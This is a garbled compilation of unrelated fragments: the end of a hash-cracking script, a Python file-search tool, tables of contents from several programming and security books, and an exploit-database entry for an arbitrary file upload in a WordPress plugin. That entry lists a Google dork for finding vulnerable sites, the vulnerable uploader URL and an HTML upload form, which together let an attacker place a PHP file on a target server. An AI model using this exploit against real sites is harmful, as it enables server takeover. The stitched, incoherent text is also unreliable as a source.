cracked = crackHash (algorithm, hashvalue, hashfile)
###################################################
# Look for the hash in Google if it was not cracked
if not cracked and googlesearch and not hashfile:
searchHash (hashvalue)
# App is finished
sys.exit()
if __name__ == "__main__":
main()
Usage: ./codefinder.py <dir> <code> <option>
Example: ./codefinder.py /home/d3hydr8 "$root_path" -ext php
#!/usr/bin/python
#Searches files for string match. You can also
#choose to only search a certain extension (php, html, py)
#d3hydr8[at]gmail[dot]com
import sys, re
def Walk( root, recurse=0, pattern='*', return_folders=0 ):
import fnmatch, os, string
result = []
try:
names = os.listdir(root)
except os.error:
return result
pattern = pattern or '*'
pat_list = string.splitfields( pattern , ';' )
for name in names:
fullname = os.path.normpath(os.path.join(root, name))
for pat in pat_list:
if fnmatch.fnmatch(name, pat):
if os.path.isfile(fullname) or (return_folders and os.path.isdir(fullname)):
result.append(fullname)
continue
if recurse:
if os.path.isdir(fullname) and not os.path.islink(fullname):
result = result + Walk( fullname, recurse, pattern, return_folders )
return result
def search(files):
print "\n[+] Searching:",len(files),"files"
for file in files:
num = 0
try:
text = open(file, "r").readlines()
for line in text:
num +=1
if re.search(sys.argv[2].lower(), line.lower()):
print "\n[!] File:",file,"\tLine:",num
print "[!]",line
except(IOError):
pass
print "\n[-] Done\n"
print "\n d3hydr8[at]gmail[dot]com CodeFinder v1.1"
print "--------------------------------------------"
if len(sys.argv) not in [3,5]:
print "\nUsage: ./codefinder.py <dir> <code> <option>"
print "\nExample: ./codefinder.py /home/d3hydr8 \"$root_path\" -ext php"
print "\t\n[options]"
print "\t -e/-ext <extension> : Will only search files with this extension.\n"
sys.exit(1)
print "\n[+] Scanning:",sys.argv[1]
print "[+] Code:",sys.argv[2]
if len(sys.argv) == 3:
files = Walk(sys.argv[1], 1, '*', 1)
search(files)
else:
files = Walk(sys.argv[1], 1, '*.'+sys.argv[4]+';')
search(files)
Chapter 1 C++ BASICS 1
Chapter 2 FLOW OF CONTROL 45
Chapter 3 FUNCTION BASICS 99
Chapter 4 PARAMETERS AND OVERLOADING 145
Chapter 5 ARRAYS 185
Chapter 6 STRUCTURES AND CLASSES 239
Chapter 7 CONSTRUCTORS AND OTHER TOOLS 275
Chapter 8 OPERATOR OVERLOADING, FRIENDS,
AND REFERENCES 321
Chapter 9 STRINGS 367
Chapter 10 POINTERS AND DYNAMIC ARRAYS 419
Chapter 11 SEPARATE COMPILATION AND NAMESPACES 471
Chapter 12 STREAMS AND FILE I/O 515
Chapter 13 RECURSION 571
Chapter 14 INHERITANCE 613
Chapter 15 POLYMORPHISM AND VIRTUAL FUNCTIONS 661
Chapter 16 TEMPLATES 693
Chapter 17 LINKED DATA STRUCTURES 731
Chapter 18 EXCEPTION HANDLING 825
Chapter 19 STANDARD TEMPLATE LIBRARY 857
Chapter 20 PATTERNS AND UML (online at www.pearsonhighered.com/
savitch)
Appendix 1 C++ KEYWORDS 915
Appendix 2 PRECEDENCE OF OPERATORS 917
Appendix 3 THE ASCII CHARACTER SET 919
Appendix 4 SOME LIBRARY FUNCTIONS 921
Appendix 5 OLD AND NEW HEADER FILES 929 https://jumpshare.com/v/ND9hHA7HPF4y87VIEZC9?b=mntMrRlbpqd1fa1GXmlw
1. C# and .NET Programming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Installing C# Express 2
C# 3.0 and .NET 3.5 3
The .NET Platform 4
The .NET Framework 4
The C# Language 5
Your First Program: Hello World 6
The Compiler 10
Examining Your First Program 11
The Integrated Development Environment 16
Summary 17
Test Your Knowledge: Quiz 18
Test Your Knowledge: Exercise 19
2. Visual Studio 2008 and C# Express 2008 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Before You Read Further 22
The Start Page 22
Projects and Solutions 22
Project Types 24
Templates 25
Inside the Integrated Development Environment 26
Building and Running Applications 28
vi | Table of Contents
Menus 29
The File Menu 29
The Edit Menu 30
The View Menu 36
The Refactor Menu 41
The Project Menu 41
The Build Menu 41
The Debug Menu 41
The Data Menu 41
The Format Menu 42
The Tools Menu 42
The Window Menu 43
The Help Menu 44
Summary 44
Test Your Knowledge: Quiz 45
Test Your Knowledge: Exercises 45
3. C# Language Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
Statements 46
Types 47
Numeric Types 48
Nonnumeric Types: char and bool 49
Types and Compiler Errors 50
WriteLine( ) and Output 51
Variables and Assignment 52
Definite Assignment 54
Implicitly Typed Variables 55
Casting 56
Constants 58
Literal Constants 58
Symbolic Constants 58
Enumerations 60
Strings 63
Whitespace 63
Summary 64
Test Your Knowledge: Quiz 65
Test Your Knowledge: Exercises 66
Table of Contents | vii
4. Operators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
Expressions 68
The Assignment Operator (=) 69
Mathematical Operators 69
Simple Arithmetic Operators (+, –, *, /) 70
The Modulus Operator (%) 71
Increment and Decrement Operators 72
The Calculate and Reassign Operators 72
Increment or Decrement by 1 73
The Prefix and Postfix Operators 73
Relational Operators 75
Logical Operators and Conditionals 77
The Conditional Operator 78
Operator Precedence 79
Summary 81
Test Your Knowledge: Quiz 82
Test Your Knowledge: Exercises 83
5. Branching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Unconditional Branching Statements 86
Conditional Branching Statements 88
if Statements 88
Single-Statement if Blocks 90
Short-Circuit Evaluation 92
if...else Statements 94
Nested if Statements 95
switch Statements 98
Fall-Through and Jump-to Cases 101
Switch on string Statements 102
ReadLine( ) and Input 103
Iteration (Looping) Statements 104
Creating Loops with goto 105
The while Loop 106
The do...while Loop 108
The for Loop 109
Summary 118
Test Your Knowledge: Quiz 119
Test Your Knowledge: Exercises 120
viii | Table of Contents
6. Object-Oriented Programming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
Creating Models 123
Classes and Objects 123
Defining a Class 124
Class Relationships 125
The Three Pillars of Object-Oriented Programming 126
Encapsulation 126
Specialization 127
Polymorphism 128
Object-Oriented Analysis and Design 129
Summary 130
Test Your Knowledge: Quiz 131
Test Your Knowledge: Exercises 131
7. Classes and Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
Defining Classes 134
Instantiating Objects 135
Creating a Box Class 137
Access Modifiers 138
Method Arguments 139
Return Types 141
Constructors 142
Initializers 144
Object Initializers 146
Anonymous Types 146
The this Keyword 147
Static and Instance Members 148
Invoking Static Methods 149
Using Static Fields 151
Finalizing Objects 154
Memory Allocation: The Stack Versus the Heap 155
Summary 161
Test Your Knowledge: Quiz 162
Test Your Knowledge: Exercises 163
8. Inside Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
Overloading Methods 165
Table of Contents | ix
Encapsulating Data with Properties 168
The get Accessor 171
The set Accessor 172
Automatic Properties 173
Returning Multiple Values 173
Passing Value Types by Reference 175
out Parameters and Definite Assignment 177
Summary 178
Test Your Knowledge: Quiz 178
Test Your Knowledge: Exercises 179
9. Basic Debugging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
Setting a Breakpoint 181
Using the Debug Menu to Set Your Breakpoint 183
Setting Conditions and Hit Counts 183
Examining Values: The Autos and Locals Windows 184
Setting Your Watch 188
The Call Stack 189
Stopping Debugging 190
Summary 191
Test Your Knowledge: Quiz 192
Test Your Knowledge: Exercises 193
10. Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197
Using Arrays 197
Declaring Arrays 198
Understanding Default Values 199
Accessing Array Elements 199
Arrays and Loops 200
The foreach Statement 203
Initializing Array Elements 204
The params Keyword 204
Multidimensional Arrays 205
Rectangular Arrays 206
Jagged Arrays 210
Array Methods 213
Sorting Arrays 214
x | Table of Contents
Summary 216
Test Your Knowledge: Quiz 217
Test Your Knowledge: Exercises 218
11. Inheritance and Polymorphism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219
Specialization and Generalization 219
Inheritance 222
Implementing Inheritance 222
Calling the Base Class Constructor 225
Hiding the Base Class Method 225
Controlling Access 226
Polymorphism 227
Creating Polymorphic Types 227
Overriding Virtual Methods 230
Using Objects Polymorphically 230
Versioning with new and override 232
Abstract Classes 234
Sealed Classes 237
The Root of All Classes: Object 237
Summary 240
Test Your Knowlege: Quiz 241
Test Your Knowledge: Exercises 241
12. Operator Overloading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Designing the Fraction Class 243
Using the operator Keyword 244
Creating Useful Operators 248
The Equals Operator 248
Conversion Operators 253
Summary 257
Test Your Knowledge: Quiz 258
Test Your Knowledge: Exercises 259
13. Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
What Interfaces Are 260
Implementing an Interface 262
Defining the Interface 265
Implementing the Interface on the Client 266
Implementing More Than One Interface 267
Table of Contents | xi
Casting to an Interface 270
The is and as Operators 270
Extending Interfaces 276
Combining Interfaces 279
Overriding Interface Methods 280
Explicit Interface Implementation 285
Summary 288
Test Your Knowledge: Quiz 290
Test Your Knowledge: Exercises 290
14. Generics and Collections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292
Generics 292
Collection Interfaces 293
Creating Your Own Collections 293
Creating Indexers 293
Indexers and Assignment 298
Indexing on Other Values 298
Generic Collection Interfaces 302
The IEnumerable<T> Interface 303
Framework Generic Collections 307
Generic Lists: List<T> 307
Generic Queues 319
Generic Stacks 322
Dictionaries 325
Summary 328
Test Your Knowledge: Quiz 329
Test Your Knowledge: Exercises 330
15. Strings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
Creating Strings 332
String Literals 332
Escape Characters 332
Verbatim Strings 333
The ToString( ) Method 333
Manipulating Strings 334
Comparing Strings 334
Concatenating Strings 336
Copying Strings 337
xii | Table of Contents
Testing for Equality 339
Other Useful String Methods 341
Finding Substrings 344
Splitting Strings 346
The StringBuilder Class 348
Regular Expressions 350
The Regex Class 351
Summary 353
Test Your Knowledge: Quiz 354
Test Your Knowledge: Exercises 355
16. Throwing and Catching Exceptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357
Bugs, Errors, and Exceptions 358
Throwing Exceptions 358
Searching for an Exception Handler 358
The throw Statement 359
The try and catch Statements 361
How the Call Stack Works 364
Creating Dedicated catch Statements 366
The finally Statement 368
Exception Class Methods and Properties 370
Custom Exceptions 374
Summary 377
Test Your Knowledge: Quiz 378
Test Your Knowledge: Exercises 378
17. Delegates and Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
Delegates 381
Events 385
Publishing and Subscribing 386
Events and Delegates 387
Solving Delegate Problems with Events 394
The event Keyword 395
Using Anonymous Methods 399
Lambda Expressions 400
Summary 401
Test Your Knowledge: Quiz 402
Test Your Knowledge: Exercises 403
Table of Contents | xiii
18. Creating Windows Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
Creating a Simple Windows Form 404
Using the Visual Studio Designer 405
Creating a Real-World Application 411
Creating the Basic UI Form 412
Populating the TreeView Controls 415
Handling the TreeView Events 422
Handling the Button Events 426
Source Code 431
Summary 439
Test Your Knowledge: Quiz 440
Test Your Knowledge: Exercises 441
19. Windows Presentation Foundation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442
Your First WPF Application 443
WPF Differences from Windows Forms 447
Using Resources 450
Animations 452
Triggers and Storyboards 453
Animations As Resources 456
C# and WPF 460
Grids and Stack Panels 461
Adding Data 466
Using the Data in the XAML 468
Defining the ListBox 468
Event Handling 470
The Complete XAML File 471
Summary 474
Test Your Knowledge: Quiz 476
Test Your Knowledge: Exercises 476
20. ADO.NET and Relational Databases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477
Relational Databases and SQL 478
Installing the Northwind Database 478
Tables, Records, and Columns 481
Normalization 482
Declarative Referential Integrity 482
SQL 483
xiv | Table of Contents
The ADO.NET Object Model 485
DataTables and DataColumns 485
DataRelations 485
Rows 485
DataAdapter 486
DbCommand and DbConnection 486
DataReader 486
Getting Started with ADO.NET 486
Summary 489
Test Your Knowledge: Quiz 490
Test Your Knowledge: Exercises 491
21. LINQ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492
Querying In-Memory Data 492
Anonymous Types and Implicitly Typed Variables 497
Lambda Expressions 499
Ordering and Joining 500
Using LINQ with SQL 505
Using the Object Relational Designer 508
Summary 513
Test Your Knowledge: Quiz 514
Test Your Knowledge: Exercises 515
About the Authors
Introduction
Chapter 1 Denial of Service
How Denial of Service Works
Distributed Denial of Service
Overview of a Denial of Service Attack
Launching the Attack
Dangers of Denial of Service
Defense against Denial of Service
General Advice
Strategy
Network Configuration
DDoS Appliances
IDS/IPS Systems
Reacting to DDoS Attacks
Over-Provisioning and Adaptive Provisioning
The Future of Denial of Service
Attack
Defense
Summary
Endnotes
Chapter 2 War Dialing
How War Dialing Attacks Work
Gathering Numbers for War Dialing
Sweeping for Live Modems
Modem Reply Types
War Dialing Tools
The Danger of War Dialing
Out-of-Band Support Channels
Unauthorized Employee Access
Vendor Support Modems
The Future of War Dialing
Defenses against War Dialing
Attack Surface Reduction
Modem Hardening
System Hardening
Discovery
Summary
Endnotes
Chapter 3 Penetration "Testing"
How Penetration Testing Software Works
Dangers with Penetration Testing Tools
Nessus Vulnerability Scanning
Metasploit Framework
Hydra Password Attacks
Future of Penetration Testing Tools
Defenses against Penetration Testing Software
Password Complexity, Lockouts, and Logging
Endpoint Protection
Egress Filtering and Proxies
Intrusion Detection and Prevention
Logical Access Controls
Summary
Chapter 4 Protocol Tunneling
How Protocol Tunneling Works
The Great Firewall
Setting Up a Channel with SSH
Corkscrew and SSH over HTTPS
SSH over HTTP
Automation
Dangers of Protocol Tunneling
Defending against Protocol Tunneling
Preventing Protocol Tunneling
Detecting Protocol Tunneling
The Future of Protocol Tunneling
Summary
Chapter 5 Spanning Tree Attacks
Layers of the Internet
Understanding the Spanning Tree Protocol
The Problem of Loops
Solving the Loop Problem with the Spanning Tree Protocol
How Spanning Tree Attacks Work
Capturing BPDU Traffic
Taking over the Root Bridge
Denial of Service
Man in the Middle
Forging BPDU Frames
Discovering the Network
Dangers of Spanning Tree Attacks
Defending against Spanning Tree Attacks
Disable STP
Root Guard and BPDU Guard
The Future of Spanning Tree Attacks
Summary
Endnote
Chapter 6 Man-in-the-Middle
How Man-in-the-Middle Attacks Work
Sniffing Network Traffic
Replay Attacks
Command Injection
Internet Control Message Protocol Redirect
Denial of Service
Dangers with Man-in-the-Middle Attacks
Address Resolution Protocol Cache Poisoning
Secure Sockets Layer Man-in-the-Middle
Domain Name System Spoofing
Future of Man-in-the-Middle Attacks
Defenses against Man-in-the-Middle Attacks
Knowing the Threats
Defense-in-Depth Approach
Public Key Infrastructure
Port Security
Use Encrypted Protocols
Low-Level Detection
Summary
Chapter 7 Password Replay
How Password Replay Works
Simple Password Sniffing
Password Replay
Address Resolution Protocol Poison Routing
Dangers of Password Replay
Defending against Password Replay
The Future of Password Replay
Summary
Endnote
Index
# Exploit Title: WordPress Plugins Viral Optins - Arbitrary File Upload
# Exploit Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7
1) Search target with Google Dorking
inurl:/wp-content/plugins/viral-optins/
2) Exploit the websites
https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
Vulnerability? Page Blank!
3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
4) Result file access.
https://localhost/wp-content/uploads/YYYY/MM/your-file.php
Indonesian h4x0r.
# 0day.today [2017-06-23] #
Part I. Development Kit Walk-Through
1. Getting to Know Android . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Why Android? 3
The Open Handset Alliance 4
The Android Execution Environment 5
Components of an Android Application 6
Android Activity Lifecycle 8
Android Service Lifecycle 10
How This Book Fits Together 10
2. Setting Up Your Android Development Environment . . . . . . . . . . . . . . . . . . . . . . . . . 13
Setting Up Your Development Environment 13
Creating an Android Development Environment 14
Hello, Android 18
Where We're Going 18
Starting a New Android Application: HelloWorld 18
Writing HelloWorld 22
Running HelloWorld 24
3. Using the Android Development Environment for Real Applications . . . . . . . . . . . . 27
MicroJobs: This Book's Main Sample Application 27
Android and Social Networking 27
Downloading the MJAndroid Code 30
A Brief Tour of the MJAndroid Code 30
The Project Root Folder (MJAndroid) 30
The Source Folder (src) 31
The Resource Folder (res) 32
First Steps: Building and Running the MicroJobs Application 33
iii
A Very Short Tour of the Android SDK/Eclipse IDE 33
Loading and Starting the Application 35
Digging a Little Deeper: What Can Go Wrong? 36
Running an Application on the T-Mobile Phone 39
Summary 41
4. Under the Covers: Startup Code and Resources in the MJAndroid Application . . . . 43
Initialization Parameters in AndroidManifest.xml 44
Initialization in MicroJobs.java 46
More Initialization of MicroJobs.java 52
Summary 56
5. Debugging Android Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
The Tools 57
Eclipse Java Editor 58
Java Errors 58
The Debugger 64
Logcat 67
Android Debug Bridge (adb) 71
DDMS: Dalvik Debug Monitor Service 74
Traceview 75
Summary 80
6. The ApiDemos Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Application Setup in the Manifest File 81
Finding the Source to an Interesting Example 83
Custom Title Demo 83
Linkify Demo 84
Adding Your Own Examples to ApiDemos 84
7. Signing and Publishing Your Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Test Your Application 88
Attach an End User License Agreement If Desired 89
Create and Attach an Icon and Label 89
Clean Up for Release 90
Version Your Application 90
Obtaining a Signing Certificate and API Key 90
Getting a Signing Certificate for an Application You Are Going to Ship 91
Getting a Signing Certificate While Debugging 93
Signing Your Application 95
Retesting Your Application 96
Publishing on Android Market 96
Signing Up As an Android Developer 96
iv | Table of Contents
Uploading Your Application 96
Part II. Programming Topics
8. Persistent Data Storage: SQLite Databases and Content Providers . . . . . . . . . . . . . 101
Databases 101
Basic Structure of the MicroJobsDatabase Class 102
Reading Data from the Database 107
Modifying the Database 110
Content Providers 114
Introducing NotePad 116
Content Providers 118
Consuming a Content Provider 129
9. Location and Mapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
Location-Based Services 137
Mapping 139
The Google Maps Activity 139
The MapView and MapActivity 140
Working with MapViews 140
MapView and MyLocationOverlay Initialization 141
Pausing and Resuming a MapActivity 144
Controlling the Map with Menu Buttons 145
Controlling the Map with the KeyPad 147
Location Without Maps 148
The Manifest and Layout Files 148
Connecting to a Location Provider and Getting Location Updates 149
Updating the Emulated Location 152
10. Building a View . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Android GUI Architecture 157
The Model 157
The View 158
The Controller 159
Putting It Together 159
Assembling a Graphical Interface 161
Wiring Up the Controller 166
Listening to the Model 168
Listening for Touch Events 173
Listening for Key Events 176
Alternative Ways to Handle Events 177
Advanced Wiring: Focus and Threading 179
Table of Contents | v
The Menu 183
11. A Widget Bestiary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187
Android Views 188
TextView and EditText 188
Button and ImageButton 191
Adapters and AdapterViews 192
CheckBoxes, RadioButtons, and Spinners 193
ViewGroups 198
Gallery and GridView 198
ListView and ListActivity 202
ScrollView 204
TabHost 205
Layouts 208
Frame Layout 209
LinearLayout 209
TableLayout 213
AbsoluteLayout 215
RelativeLayout 216
12. Drawing 2D and 3D Graphics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 221
Rolling Your Own Widgets 221
Layout 222
Canvas Drawing 226
Drawables 237
Bitmaps 242
Bling 243
Shadows, Gradients, and Filters 246
Animation 247
OpenGL Graphics 252
13. Inter-Process Communication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
Intents: Simple, Low-Overhead IPC 258
Intent Objects Used in Inter-Process Communication 258
Activity Objects and Navigating the User Interface Hierarchy 259
Example: An Intent to Pick How We Say "Hello World" 259
Getting a Result via Inter-Process Communication 262
Remote Methods and AIDL 265
Android Interface Definition Language 266
Classes Underlying AIDL-Generated Interfaces 270
Publishing an Interface 273
Android IPC Compared with Java Native Interface (JNI) 274
What Binder Doesn't Do 275
vi | Table of Contents
Binder and Linux 275
14. Simple Phone Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
Quick and Easy Phone Calls 277
Creating an Example Application to Run the call Method 278
Embedding the Code Snippet in a Simple Application 279
Exploring the Phone Code Through the Debugger 280
Creating an Instance of an Intent 282
Adding Data to an Instance of an Intent 283
Initiating a Phone Call 284
Exception Handling 284
Android Application-Level Modularity and Telephony 285
15. Telephony State Information and Android Telephony Classes . . . . . . . . . . . . . . . . 287
Operations Offered by the android.telephony Package 287
Package Summary 288
Limitations on What Applications Can Do with the Phone 288
Example: Determining the State of a Call 289
Android Telephony Internals 291
Inter-Process Communication and AIDL in the
android.internal.telephony Package 291
The android.internal.telephony Package 292
The android.internal.telephony.gsm Package 295
Exploring Android Telephony Internals 299
Android and VoIP 302
Appendix: Wireless Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
Instant Burp Suite Starter 1
So, what is Burp Suite? 3
Installation 5
Step 1 – What do I need? 5
Step 2 – Downloading Burp Suite 5
Step 3 – Launching Burp Suite 5
Windows 5
Linux and Mac OS X 6
Step 4 – Verify Burp Proxy configuration 6
Step 5 – Configuring the browser 8
Mozilla Firefox 8
Microsoft Internet Explorer 9
And that's it!! 10
One more thing... 11
Quick start – Using Burp Proxy 13
Step 1 – Intercepting web requests 13
Step 2 – Inspecting web requests 15
Step 3 – Tampering web requests 17
Advanced features 18
Match and replace 18
HTML modification 20
Top 8 features you need to know about 21
1 – Using the target site map functionality 21
2 – Crawling a web application with Burp Spider 24
3 – Launching an automatic scan with Burp Scanner 27
4 – Automating customized attacks with Burp Intruder 35
Configuring the target 36
Configuring the attack type and positions 36
Configuring payloads 38
Additional Burp Intruder options 39
Launching an attack 40
Table of Contents
[ ii ]
5 – Manipulating and iterating web requests with Burp Repeater 41
6 – Analysing application data randomness with Burp Sequencer 44
7 – Decoding and encoding data with Burp Decoder 47
8 – Comparing site maps 49
People and places you should get to know 55
Official sites 55
Articles and tutorials 55
Community 55
Foreword. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxv
Part I Nessus Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Chapter 1 The Inner Workings of NASL
(Nessus Attack Scripting Language) . . . . . . . . . . . . . . . . 3
Introduction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
What Is NASL? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Structure of a NASL Script . . . . . . . . . . . . . . . . . . . . . . .4
The Description Section. . . . . . . . . . . . . . . . . . . . . . . 4
The Test Section. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Writing Your First Script . . . . . . . . . . . . . . . . . . . . . . . .7
Commonly Used Functions . . . . . . . . . . . . . . . . . . . . . . . . . 9
Regular Expressions in NASL . . . . . . . . . . . . . . . . . . . .11
String Manipulation . . . . . . . . . . . . . . . . . . . . . . . . . . .12
How Strings Are Defined in NASL . . . . . . . . . . . . . . 12
String Addition and Subtraction . . . . . . . . . . . . . . . . 13
String Search and Replace . . . . . . . . . . . . . . . . . . . . 13
Nessus Daemon Requirements to Load a NASL . . . . . . . . . 14
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Chapter 2 Debugging NASLs . . . . . . . . . . . . . . . . . . . . . 15
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .16
How to Debug NASLs Using the Runtime Environment. . . 16
Validity of the Code . . . . . . . . . . . . . . . . . . . . . . . . . . .16
Validity of the Vulnerability Test . . . . . . . . . . . . . . . . . . .21
How to Debug NASLs Using the Nessus Daemon
Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .28
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xiii
xiv Contents
Chapter 3 Extensions and Custom Tests . . . . . . . . . . . 29
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30
Extending NASL Using Include Files . . . . . . . . . . . . . . . . . 30
Include Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30
Extending the Capabilities of TestsUsing the Nessus
Knowledge Base . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
Extending the Capabilities of Tests Using Process
Launching and Results Analysis . . . . . . . . . . . . . . . . . . . . . 35
What Can We Do with TRUSTED Functions? . . . . . . .36
Creating a TRUSTED Test . . . . . . . . . . . . . . . . . . . . . .37
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
Chapter 4 Understanding the Extended Capabilities
of the Nessus Environment . . . . . . . . . . . . . . . . . . . . . . 43
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44
Windows Testing Functionality Provided by the
smb_nt.inc Include File. . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Windows Testing Functionality Provided by the
smb_hotfixes.inc Include File . . . . . . . . . . . . . . . . . . . . .47
UNIX Testing Functionality Provided by the
Local Testing Include Files . . . . . . . . . . . . . . . . . . . . . . .50
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
Chapter 5 Analyzing GetFileVersion and MySQL
Passwordless Test. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .58
Integrating NTLM Authentication into Nessus' HTTP
Authentication Mechanism . . . . . . . . . . . . . . . . . . . . . . . . . 58
NTLM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .58
Improving the MySQL Test by Utilizing Packet Dumps . . . . 70
Improving Nessus' GetFileVersion Function by Creating
a PE Header Parser. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
Chapter 6 Automating the Creation of NASLs . . . . . . . 95
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .96
Plugin Templates: Making Many from Few. . . . . . . . . . . . . . 96
Common Web Application Security Issues . . . . . . . . . . .96
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xiv
Contents xv
Server-Side Execution (SQL Injection,
Code Inclusion) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
Client-Side Execution (Code Injection, Cross-Site
Scripting, HTTP Response Splitting) . . . . . . . . . . . . 98
Creating Web Application Plugin Templates . . . . . . . . . .99
Detecting Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . .100
Making the Plugin More General . . . . . . . . . . . . . . . .101
Parameterize the Detection and Trigger Strings . . . . 101
Allow Different Installation dirs. . . . . . . . . . . . . . . . 101
Allow Different HTTP Methods . . . . . . . . . . . . . . . 102
Multiple Attack Vectors. . . . . . . . . . . . . . . . . . . . . . 103
Increasing Plugin Accuracy . . . . . . . . . . . . . . . . . . . . .107
The "Why Bother" Checks. . . . . . . . . . . . . . . . . . . 107
Avoiding the Pitfalls . . . . . . . . . . . . . . . . . . . . . . . . 108
The Final Plugin Template . . . . . . . . . . . . . . . . . . . . . .111
Rules of Thumb . . . . . . . . . . . . . . . . . . . . . . . . . . . . .114
Using a CGI Module for Plugin Creation . . . . . . . . . . . . . 115
CGI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .115
Perl's CGI Class . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Template .conf File . . . . . . . . . . . . . . . . . . . . . . . . . . .116
Plugin Factory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .117
Final Setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .124
Example Run . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .124
Advanced Plugin Generation: XML Parsing for
Plugin Creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
XML Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .126
XML As a Data Holder. . . . . . . . . . . . . . . . . . . . . . 127
Using mssecure.xml for Microsoft Security Bulletins . . .128
The mssecure XML Schema . . . . . . . . . . . . . . . . . . 128
The Plugin Template . . . . . . . . . . . . . . . . . . . . . . . . . .129
Ins and Outs of the Template. . . . . . . . . . . . . . . . . . 130
Filling in the Template Manually . . . . . . . . . . . . . . . . .132
General Bulletin Information . . . . . . . . . . . . . . . . . 132
The Finished Template . . . . . . . . . . . . . . . . . . . . . . 134
The Command-Line Tool . . . . . . . . . . . . . . . . . . . . . .135
